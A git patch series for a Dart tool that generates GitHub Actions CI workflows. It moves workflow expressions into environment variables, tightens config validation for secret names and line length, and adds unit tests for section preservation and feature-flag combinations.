Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ 
secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - uses: dart-lang/setup-dart@v1.7.1 with: @@ -585,30 +599,34 @@ jobs: env: GEMINI_API_KEY: ${{ secrets.CICD_GEMINI_API_KEY_OPEN_RUNTIME }} GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PREV_TAG: ${{ needs.determine-version.outputs.prev_tag }} + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | dart run runtime_ci_tooling:manage_cicd release-notes \ - --prev-tag "${{ needs.determine-version.outputs.prev_tag }}" \ - --version "${{ needs.determine-version.outputs.new_version }}" + --prev-tag "$PREV_TAG" \ + --version "$NEW_VERSION" # Consolidate all release notes files under .runtime_ci/release_notes/ before upload. # Mixing relative and absolute paths in upload-artifact causes path # resolution issues. Keep everything under one root. 
- name: Consolidate release notes + env: + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | - VERSION="${{ needs.determine-version.outputs.new_version }}" - mkdir -p ".runtime_ci/release_notes/v${VERSION}" - cp /tmp/release_notes_body.md ".runtime_ci/release_notes/v${VERSION}/" 2>/dev/null || true - cp /tmp/migration_guide.md ".runtime_ci/release_notes/v${VERSION}/" 2>/dev/null || true - echo "Contents of .runtime_ci/release_notes/v${VERSION}/:" - ls -la ".runtime_ci/release_notes/v${VERSION}/" 2>/dev/null || echo "(empty)" + mkdir -p ".runtime_ci/release_notes/v${NEW_VERSION}" + cp /tmp/release_notes_body.md ".runtime_ci/release_notes/v${NEW_VERSION}/" 2>/dev/null || true + cp /tmp/migration_guide.md ".runtime_ci/release_notes/v${NEW_VERSION}/" 2>/dev/null || true + echo "Contents of .runtime_ci/release_notes/v${NEW_VERSION}/:" + ls -la ".runtime_ci/release_notes/v${NEW_VERSION}/" 2>/dev/null || echo "(empty)" - name: Ensure release notes artifact is non-empty shell: bash + env: + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | - VERSION="${{ needs.determine-version.outputs.new_version }}" - mkdir -p ".runtime_ci/release_notes/v${VERSION}" - if [ ! -f ".runtime_ci/release_notes/v${VERSION}/release_notes_body.md" ]; then - echo "Release notes unavailable for v${VERSION}." > ".runtime_ci/release_notes/v${VERSION}/release_notes_body.md" + mkdir -p ".runtime_ci/release_notes/v${NEW_VERSION}" + if [ ! -f ".runtime_ci/release_notes/v${NEW_VERSION}/release_notes_body.md" ]; then + echo "Release notes unavailable for v${NEW_VERSION}." 
> ".runtime_ci/release_notes/v${NEW_VERSION}/release_notes_body.md" echo "Created fallback release_notes_body.md" fi @@ -646,12 +664,13 @@ jobs: - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - uses: dart-lang/setup-dart@v1.7.1 with: @@ -693,34 +712,35 @@ jobs: merge-multiple: false - name: Prepare artifacts + env: + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | - VERSION="${{ needs.determine-version.outputs.new_version }}" - mkdir -p ./artifacts ./.runtime_ci/version_bumps "./.runtime_ci/release_notes/v${VERSION}" + mkdir -p ./artifacts ./.runtime_ci/version_bumps "./.runtime_ci/release_notes/v${NEW_VERSION}" # Stage 3 release notes: downloaded artifact has release_notes/ root # so files land at ./release-notes-artifacts/vX.X.X/release_notes.md - if [ -d "./release-notes-artifacts/v${VERSION}" ]; then - cp -r "./release-notes-artifacts/v${VERSION}/"* "./.runtime_ci/release_notes/v${VERSION}/" 
2>/dev/null || true - echo "Copied Stage 3 artifacts from release-notes-artifacts/v${VERSION}/" + if [ -d "./release-notes-artifacts/v${NEW_VERSION}" ]; then + cp -r "./release-notes-artifacts/v${NEW_VERSION}/"* "./.runtime_ci/release_notes/v${NEW_VERSION}/" 2>/dev/null || true + echo "Copied Stage 3 artifacts from release-notes-artifacts/v${NEW_VERSION}/" elif [ -d "./release-notes-artifacts" ]; then # Fallback: search recursively for release_notes.md FOUND=$(find ./release-notes-artifacts -name "release_notes.md" -type f 2>/dev/null | head -1) if [ -n "$FOUND" ]; then - cp "$(dirname "$FOUND")"/* "./.runtime_ci/release_notes/v${VERSION}/" 2>/dev/null || true + cp "$(dirname "$FOUND")"/* "./.runtime_ci/release_notes/v${NEW_VERSION}/" 2>/dev/null || true echo "Found release notes via recursive search: $FOUND" fi fi # Copy release_notes_body.md to /tmp/ for Dart script - if [ -f "./.runtime_ci/release_notes/v${VERSION}/release_notes_body.md" ]; then - cp "./.runtime_ci/release_notes/v${VERSION}/release_notes_body.md" /tmp/release_notes_body.md - elif [ -f "./.runtime_ci/release_notes/v${VERSION}/release_notes.md" ]; then - cp "./.runtime_ci/release_notes/v${VERSION}/release_notes.md" /tmp/release_notes_body.md + if [ -f "./.runtime_ci/release_notes/v${NEW_VERSION}/release_notes_body.md" ]; then + cp "./.runtime_ci/release_notes/v${NEW_VERSION}/release_notes_body.md" /tmp/release_notes_body.md + elif [ -f "./.runtime_ci/release_notes/v${NEW_VERSION}/release_notes.md" ]; then + cp "./.runtime_ci/release_notes/v${NEW_VERSION}/release_notes.md" /tmp/release_notes_body.md fi # List what we found echo "Release notes contents:" - ls -la "./.runtime_ci/release_notes/v${VERSION}/" 2>/dev/null || echo "(empty)" + ls -la "./.runtime_ci/release_notes/v${NEW_VERSION}/" 2>/dev/null || echo "(empty)" # Merge all downloaded audit trail artifacts from different jobs into # a single .runtime_ci/runs/ directory so archive-run can find them. @@ -735,20 +755,25 @@ jobs: # the release. 
This replaces the old post-release archive that could # never work because .runtime_ci/runs/ didn't exist on the fresh runner. - name: Archive audit trail + env: + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | dart run runtime_ci_tooling:manage_cicd archive-run \ - --version "${{ needs.determine-version.outputs.new_version }}" + --version "$NEW_VERSION" - name: Create release env: GH_TOKEN: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN }} GITHUB_TOKEN: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN }} + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} + PREV_TAG: ${{ needs.determine-version.outputs.prev_tag }} + REPO_NAME: ${{ github.repository }} run: | dart run runtime_ci_tooling:manage_cicd create-release \ - --version "${{ needs.determine-version.outputs.new_version }}" \ - --prev-tag "${{ needs.determine-version.outputs.prev_tag }}" \ + --version "$NEW_VERSION" \ + --prev-tag "$PREV_TAG" \ --artifacts-dir ./artifacts \ - --repo "${{ github.repository }}" + --repo "$REPO_NAME" # ============================================================================ # Job 7: Post-Release Triage @@ -765,12 +790,13 @@ jobs: - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global 
url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - uses: dart-lang/setup-dart@v1.7.1 with: @@ -808,9 +834,11 @@ jobs: env: GEMINI_API_KEY: ${{ secrets.CICD_GEMINI_API_KEY_OPEN_RUNTIME }} GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} + REPO_NAME: ${{ github.repository }} run: | dart run runtime_ci_tooling:manage_cicd triage post-release \ - --version "${{ needs.determine-version.outputs.new_version }}" \ - --release-tag "v${{ needs.determine-version.outputs.new_version }}" \ - --release-url "https://github.com/${{ github.repository }}/releases/tag/v${{ needs.determine-version.outputs.new_version }}" \ + --version "$NEW_VERSION" \ + --release-tag "v${NEW_VERSION}" \ + --release-url "https://github.com/${REPO_NAME}/releases/tag/v${NEW_VERSION}" \ --manifest /tmp/issue_manifest.json diff --git a/.runtime_ci/template_versions.json b/.runtime_ci/template_versions.json index cb02ab0..627b907 100644 --- a/.runtime_ci/template_versions.json +++ b/.runtime_ci/template_versions.json @@ -1,6 +1,6 @@ { "tooling_version": "0.14.0", - "updated_at": "2026-02-25T00:56:25.768561Z", + "updated_at": "2026-02-25T01:44:16.353491Z", "templates": { "gemini_settings": { "hash": "93983f49dd2f40d2ed245271854946d8916b8f0698ed2cfaf12058305baa0b08", @@ -23,19 +23,19 @@ "updated_at": "2026-02-24T00:59:57.620091Z" }, "workflow_ci": { - "hash": "de1765ea0dff5801a219ba046d25e890155e2ef3cbaa817563125926891aecae", - "consumer_hash": "7e82ac3ccf2e0b584b0797809862cc5c694e5a36923fd78c8565c8bb558eec7b", - "updated_at": "2026-02-25T00:56:25.769334Z" + "hash": "d12b15077608ffdd3b92b21c0a7df520ea38278c0816b82e5925564678e3c59f", + "consumer_hash": 
"20eb207d18e17e6bb84ce1b19908e8bdca2bf3a26ea8e8c00a09e94c33deb0f2", + "updated_at": "2026-02-25T01:44:16.349990Z" }, "workflow_release": { - "hash": "326627cf41fdeb6cd61dae2fda98599d5815a34e63e4a8af1aaa8f7ad18435d3", - "consumer_hash": "326627cf41fdeb6cd61dae2fda98599d5815a34e63e4a8af1aaa8f7ad18435d3", - "updated_at": "2026-02-24T00:59:57.767027Z" + "hash": "ed0e8fb331d9c3d8827a71d320408d5ff603dcc1449eb2f6ee20b115469e0bd9", + "consumer_hash": "ed0e8fb331d9c3d8827a71d320408d5ff603dcc1449eb2f6ee20b115469e0bd9", + "updated_at": "2026-02-25T01:44:16.352226Z" }, "workflow_issue_triage": { - "hash": "a6364383fd2284c875e765ca183c94c9833248acbfd4ff039372efed8f14f47c", - "consumer_hash": "a6364383fd2284c875e765ca183c94c9833248acbfd4ff039372efed8f14f47c", - "updated_at": "2026-02-24T00:59:57.805191Z" + "hash": "960012c66f7a59ac16ed89d6c7d34244ef1dd16efb6c0a66244431ad49e0f28e", + "consumer_hash": "960012c66f7a59ac16ed89d6c7d34244ef1dd16efb6c0a66244431ad49e0f28e", + "updated_at": "2026-02-25T01:44:16.353504Z" } } } diff --git a/USAGE.md b/USAGE.md index c86bb40..e054296 100644 --- a/USAGE.md +++ b/USAGE.md @@ -1255,7 +1255,7 @@ final exists = await commandExists('git'); 4. **Multi-platform mode** (`ci.platforms` has 2+ entries): - `analyze` — Run analysis once (Ubuntu) - `test` — Run tests as a matrix across OS+arch (`x64` + `arm64`) -5. Optional `web-test` — If `ci.features.web_test=true`, runs `dart test -p chrome` in a standalone Ubuntu job with deterministic Chrome provisioning via `browser-actions/setup-chrome@v2` +5. Optional `web-test` — If `ci.features.web_test=true`, runs `dart test -p chrome` in a standalone Ubuntu job with deterministic Chrome provisioning via SHA-pinned `browser-actions/setup-chrome@v2.1.1` **Platform matrix configuration:** - `ci.platforms`: list of platform IDs (e.g. 
`["ubuntu-x64","ubuntu-arm64","macos-arm64","macos-x64","windows-x64","windows-arm64"]`) @@ -1263,7 +1263,7 @@ final exists = await commandExists('git'); **Optional features:** - `ci.features.build_runner`: When `true`, runs `dart run build_runner build --delete-conflicting-outputs` before analyze, test, and web-test steps to regenerate `.g.dart` codegen files -- `ci.features.web_test`: When `true`, adds a `web-test` job that provisions Chrome via `browser-actions/setup-chrome@v2` and runs `dart test -p chrome`. Configure via `ci.web_test`: +- `ci.features.web_test`: When `true`, adds a `web-test` job that provisions Chrome via SHA-pinned `browser-actions/setup-chrome@v2.1.1` and runs `dart test -p chrome`. Configure via `ci.web_test`: - `concurrency` (1–32, default `1`): parallel test shards - `paths`: list of relative repo paths (e.g. `["test/web/"]`): paths are normalized, shell-quoted, and validated (no traversal, no shell metacharacters). Empty list = run all tests diff --git a/templates/config.json b/templates/config.json index b5de060..3da8593 100644 --- a/templates/config.json +++ b/templates/config.json @@ -78,8 +78,7 @@ }, "secrets": {}, "sub_packages": [], - "_comment_web_test": "Optional: when features.web_test is true, set web_test to { \"concurrency\": 1, \"paths\": [] } (or leave as {} to use defaults).", - "web_test": {}, + "_comment_web_test": "When features.web_test is true, add web_test: { \"concurrency\": 1, \"paths\": [] } (or {} for defaults).", "_comment_platforms": "Optional: CI platform matrix. When 2+ entries are provided, CI splits into analyze + matrix test jobs.", "platforms": ["ubuntu-x64", "ubuntu-arm64", "macos-arm64", "macos-x64", "windows-x64", "windows-arm64"], "_comment_runner_overrides": "Optional: override platform IDs to custom runs-on labels (e.g. org-managed GitHub-hosted runners). 
Keys must match ci.platforms entries.", diff --git a/templates/github/workflows/ci.skeleton.yaml b/templates/github/workflows/ci.skeleton.yaml index 939b08c..5abc72c 100644 --- a/templates/github/workflows/ci.skeleton.yaml +++ b/templates/github/workflows/ci.skeleton.yaml @@ -59,7 +59,7 @@ jobs: sdk: "<%dart_sdk%>" - name: Format code - run: dart format --line-length <%line_length%> lib/ + run: dart format --line-length <%line_length%> . - name: Commit and push formatting id: format-push @@ -67,7 +67,7 @@ jobs: if ! git diff --quiet; then git config user.name "github-actions[bot]" git config user.email "41898282+github-actions[bot]@users.noreply.github.com" - git add lib/ + git add -u -- '*.dart' git commit -m "bot(format): apply dart format --line-length <%line_length%> [skip ci]" if git push; then echo "sha=$(git rev-parse HEAD)" >> "$GITHUB_OUTPUT" From e4ad4404f5fa9e5c6b369acfb596abed22e1f7f0 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 20:49:51 -0500 Subject: [PATCH 09/16] fix: tighten ci config validation rules Enforce uppercase-only secret identifiers and digits-only line_length string values, with corresponding test coverage updates. Include pending workflow template dependency change currently in local working tree. --- lib/src/cli/utils/workflow_generator.dart | 12 ++--- templates/github/workflows/ci.skeleton.yaml | 2 +- test/workflow_generator_test.dart | 53 ++++++++++++++++++++- 3 files changed, 58 insertions(+), 9 deletions(-) diff --git a/lib/src/cli/utils/workflow_generator.dart b/lib/src/cli/utils/workflow_generator.dart index 130ff2c..f2520c5 100644 --- a/lib/src/cli/utils/workflow_generator.dart +++ b/lib/src/cli/utils/workflow_generator.dart @@ -58,9 +58,9 @@ const Set _knownFeatureKeys = { const Set _knownWebTestKeys = {'concurrency', 'paths'}; /// Safe identifier for env vars and GitHub secrets (e.g. API_KEY, GITHUB_TOKEN). -/// Must start with letter or underscore, then alphanumeric/underscore only. 
+/// Must start with uppercase letter, then uppercase letters, digits, underscores only. bool _isSafeSecretIdentifier(String s) { - return RegExp(r'^[A-Za-z_][A-Za-z0-9_]*$').hasMatch(s); + return RegExp(r'^[A-Z][A-Z0-9_]*$').hasMatch(s); } /// Runner label must not contain newlines, control chars, or YAML-injection chars. @@ -415,11 +415,11 @@ class WorkflowGenerator { errors.add('ci.line_length must not have leading/trailing whitespace'); } else if (lineLength.contains(RegExp(r'[\r\n\t\x00-\x1f]'))) { errors.add('ci.line_length must not contain newlines or control characters'); + } else if (!RegExp(r'^\d+$').hasMatch(lineLength)) { + errors.add('ci.line_length string must be digits only (e.g. 120), got "$lineLength"'); } else { - final parsed = int.tryParse(lineLength); - if (parsed == null) { - errors.add('ci.line_length string must be numeric, got "$lineLength"'); - } else if (parsed < 1 || parsed > 10000) { + final parsed = int.parse(lineLength); + if (parsed < 1 || parsed > 10000) { errors.add('ci.line_length must be between 1 and 10000, got $lineLength'); } } diff --git a/templates/github/workflows/ci.skeleton.yaml b/templates/github/workflows/ci.skeleton.yaml index 5abc72c..a85058a 100644 --- a/templates/github/workflows/ci.skeleton.yaml +++ b/templates/github/workflows/ci.skeleton.yaml @@ -458,7 +458,7 @@ jobs: <%/multi_platform%> <%#web_test%> web-test: - needs: [pre-check<%#format_check%>, auto-format<%/format_check%><%#single_platform%>, analyze-and-test<%/single_platform%><%#multi_platform%>, analyze<%/multi_platform%>] + needs: [pre-check<%#format_check%>, auto-format<%/format_check%><%#multi_platform%>, analyze<%/multi_platform%>] if: needs.pre-check.outputs.should_run == 'true' runs-on: ubuntu-latest <%#has_secrets%> diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index 2b0c8a9..a793b3f 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -299,6 +299,27 @@ void main() { ); 
expect(errors.where((e) => e.contains('secrets')), isEmpty); }); + + test('secrets key with leading underscore produces error (must start with uppercase letter)', () { + final errors = WorkflowGenerator.validate( + _validConfig(secrets: {'_API_KEY': 'MY_SECRET'}), + ); + expect(errors, anyElement(contains('safe identifier'))); + }); + + test('secrets key with lowercase produces error (uppercase only)', () { + final errors = WorkflowGenerator.validate( + _validConfig(secrets: {'api_key': 'MY_SECRET'}), + ); + expect(errors, anyElement(contains('safe identifier'))); + }); + + test('secrets value with lowercase produces error (uppercase only)', () { + final errors = WorkflowGenerator.validate( + _validConfig(secrets: {'API_KEY': 'my_secret'}), + ); + expect(errors, anyElement(contains('safe secret name'))); + }); }); // ---- personal_access_token_secret ---- @@ -354,6 +375,20 @@ void main() { isEmpty, ); }); + + test('pat with leading underscore produces error (must start with uppercase letter)', () { + final errors = WorkflowGenerator.validate( + _validConfig(pat: '_MY_PAT'), + ); + expect(errors, anyElement(contains('safe identifier'))); + }); + + test('pat with lowercase produces error (uppercase only)', () { + final errors = WorkflowGenerator.validate( + _validConfig(pat: 'my_pat'), + ); + expect(errors, anyElement(contains('safe identifier'))); + }); }); // ---- line_length ---- @@ -382,11 +417,25 @@ void main() { expect(errors.where((e) => e.contains('line_length')), isEmpty); }); - test('string line_length "abc" produces error (must be numeric)', () { + test('string line_length "abc" produces error (must be digits only)', () { final errors = WorkflowGenerator.validate( _validConfig(lineLength: 'abc'), ); - expect(errors, anyElement(contains('must be numeric'))); + expect(errors, anyElement(contains('digits only'))); + }); + + test('string line_length "+120" produces error (digits only, no sign)', () { + final errors = WorkflowGenerator.validate( + 
_validConfig(lineLength: '+120'), + ); + expect(errors, anyElement(contains('digits only'))); + }); + + test('string line_length "-120" produces error (digits only, no sign)', () { + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: '-120'), + ); + expect(errors, anyElement(contains('digits only'))); }); test('string line_length with leading/trailing whitespace produces error', From d017a209771a73f38103335276b379643ea01f63 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 20:51:51 -0500 Subject: [PATCH 10/16] test: add _preserveUserSections edge cases and feature flag combination tests - Add 6 _preserveUserSections tests: unknown section name, missing END marker, mismatched BEGIN/END names, regex-special characters in content, null existingContent, unrelated existingContent - Add 13 feature flag combination tests: format_check+web_test, build_runner+web_test, proto+web_test, multi-platform+web_test, single-platform+web_test (no analyze-and-test dep), secrets in web-test, lfs+web_test, managed_test in multi-platform, all features enabled, no features enabled, sub_packages render, runner_overrides - Total: 240 tests, all passing Co-Authored-By: Claude Opus 4.6 --- test/workflow_generator_test.dart | 312 ++++++++++++++++++++++++++++++ 1 file changed, 312 insertions(+) diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index a793b3f..e00ed8e 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -1725,6 +1725,318 @@ void main() { // post-test: real content was preserved expect(rendered, contains('echo kept')); }); + + test('unknown section name in existing content is silently ignored', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final base = gen.render(); + // Add a user section that doesn't exist in the skeleton + final existing = '$base\n# --- BEGIN USER: nonexistent ---\n custom: stuff\n# --- END 
USER: nonexistent ---\n'; + final rendered = gen.render(existingContent: existing); + // The unknown section content should not appear in the rendered output + // (there's no matching placeholder to insert it into) + expect(rendered, isNot(contains('custom: stuff'))); + // Known sections still render correctly + expect(rendered, contains('# --- BEGIN USER: pre-test ---')); + }); + + test('malformed section markers (missing END) are ignored', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final base = gen.render(); + // Inject a BEGIN without matching END — regex won't match, so it's ignored + final existing = base.replaceFirst( + '# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---', + '# --- BEGIN USER: pre-test ---\n - run: echo orphan\n', + ); + final rendered = gen.render(existingContent: existing); + // The orphaned content won't be extracted (regex requires matched pair) + expect(rendered, isNot(contains('echo orphan'))); + }); + + test('mismatched section names (BEGIN X / END Y) are ignored', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final base = gen.render(); + final existing = base.replaceFirst( + '# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---', + '# --- BEGIN USER: pre-test ---\n - run: echo mismatch\n# --- END USER: post-test ---', + ); + final rendered = gen.render(existingContent: existing); + // Mismatched names: regex backreference \1 won't match, so nothing extracted + expect(rendered, isNot(contains('echo mismatch'))); + }); + + test('section content with regex-special characters is preserved verbatim', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final base = gen.render(); + // Content with regex special chars: $, (), *, +, ?, |, ^, {, } + const specialContent = r' - run: echo "${{ matrix.os }}" && test [[ "$(whoami)" == "ci" 
]]'; + final existing = base.replaceFirst( + '# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---', + '# --- BEGIN USER: pre-test ---\n$specialContent\n# --- END USER: pre-test ---', + ); + final rendered = gen.render(existingContent: existing); + expect(rendered, contains(specialContent)); + }); + + test('null existingContent produces same output as no existingContent', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final withoutExisting = gen.render(); + final withNull = gen.render(existingContent: null); + expect(withNull, equals(withoutExisting)); + }); + + test('existingContent with no user sections produces same output as fresh render', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final fresh = gen.render(); + // Use a completely unrelated string as existing content + final rendered = gen.render(existingContent: 'name: SomeOtherWorkflow\non: push'); + expect(rendered, equals(fresh)); + }); + }); + + // ---- render() feature flag combinations ---- + group('feature flag combinations', () { + test('format_check + web_test: web-test needs includes auto-format', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + featureOverrides: {'format_check': true}, + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final webTestJob = parsed['jobs']['web-test'] as YamlMap; + final needs = (webTestJob['needs'] as YamlList).toList(); + expect(needs, contains('pre-check')); + expect(needs, contains('auto-format')); + }); + + test('web_test without format_check: web-test needs omits auto-format', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(webTest: true), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final webTestJob = 
parsed['jobs']['web-test'] as YamlMap; + final needs = (webTestJob['needs'] as YamlList).toList(); + expect(needs, contains('pre-check')); + expect(needs, isNot(contains('auto-format'))); + }); + + test('build_runner + web_test: web-test job contains build_runner step', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + featureOverrides: {'build_runner': true}, + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + // Find the web-test job section and check it contains build_runner + final webTestStart = rendered.indexOf('web-test:'); + expect(webTestStart, isNot(-1)); + final afterWebTest = rendered.substring(webTestStart); + expect(afterWebTest, contains('Run build_runner')); + }); + + test('proto + web_test: web-test job contains proto steps', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + featureOverrides: {'proto': true}, + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final webTestStart = rendered.indexOf('web-test:'); + expect(webTestStart, isNot(-1)); + final afterWebTest = rendered.substring(webTestStart); + expect(afterWebTest, contains('Install protoc')); + expect(afterWebTest, contains('Verify proto files')); + }); + + test('multi-platform + web_test: web-test depends on analyze (not test)', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + platforms: ['ubuntu', 'macos'], + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final webTestJob = parsed['jobs']['web-test'] as YamlMap; + final needs = (webTestJob['needs'] as YamlList).toList(); + expect(needs, contains('analyze')); + expect(needs, isNot(contains('test'))); + expect(needs, isNot(contains('analyze-and-test'))); + }); + + test('single-platform + web_test: web-test does not depend on analyze-and-test', () { + final gen = WorkflowGenerator( + ciConfig: 
_minimalValidConfig( + webTest: true, + platforms: ['ubuntu'], + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final webTestJob = parsed['jobs']['web-test'] as YamlMap; + final needs = (webTestJob['needs'] as YamlList).toList(); + expect(needs, contains('pre-check')); + expect(needs, isNot(contains('analyze-and-test'))); + }); + + test('secrets render in web-test job env block', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(webTest: true) + ..['secrets'] = {'API_KEY': 'MY_SECRET'}, + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final webTestStart = rendered.indexOf('web-test:'); + expect(webTestStart, isNot(-1)); + final afterWebTest = rendered.substring(webTestStart); + expect(afterWebTest, contains('API_KEY')); + expect(afterWebTest, contains('MY_SECRET')); + }); + + test('lfs + web_test: web-test checkout has lfs: true', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + featureOverrides: {'lfs': true}, + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final webTestStart = rendered.indexOf('web-test:'); + expect(webTestStart, isNot(-1)); + final afterWebTest = rendered.substring(webTestStart); + expect(afterWebTest, contains('lfs: true')); + }); + + test('managed_test in multi-platform: test job uses managed test command', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + featureOverrides: {'managed_test': true}, + platforms: ['ubuntu', 'macos'], + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final testJob = parsed['jobs']['test'] as YamlMap; + final steps = (testJob['steps'] as YamlList).toList(); + final testStep = steps.firstWhere( + (s) => s is YamlMap && s['name'] == 'Test', + orElse: () => null, + ); + expect(testStep, isNotNull); + expect((testStep as YamlMap)['run'], 
contains('manage_cicd test')); + }); + + test('all features enabled renders valid YAML', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + webTestConfig: {'concurrency': 4, 'paths': ['test/web/']}, + featureOverrides: { + 'proto': true, + 'lfs': true, + 'format_check': true, + 'analysis_cache': true, + 'managed_analyze': true, + 'managed_test': true, + 'build_runner': true, + }, + platforms: ['ubuntu', 'macos'], + )..['secrets'] = {'API_KEY': 'MY_SECRET'}, + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + // Must parse as valid YAML + final parsed = loadYaml(rendered) as YamlMap; + final jobs = parsed['jobs'] as YamlMap; + expect(jobs.containsKey('pre-check'), isTrue); + expect(jobs.containsKey('auto-format'), isTrue); + expect(jobs.containsKey('analyze'), isTrue); + expect(jobs.containsKey('test'), isTrue); + expect(jobs.containsKey('web-test'), isTrue); + // web-test should have Chrome setup + final webTestSteps = (jobs['web-test']['steps'] as YamlList).toList(); + final chromeStep = webTestSteps.firstWhere( + (s) => s is YamlMap && s['name'] == 'Setup Chrome', + orElse: () => null, + ); + expect(chromeStep, isNotNull); + }); + + test('no features enabled (all false) renders minimal valid YAML', () { + final 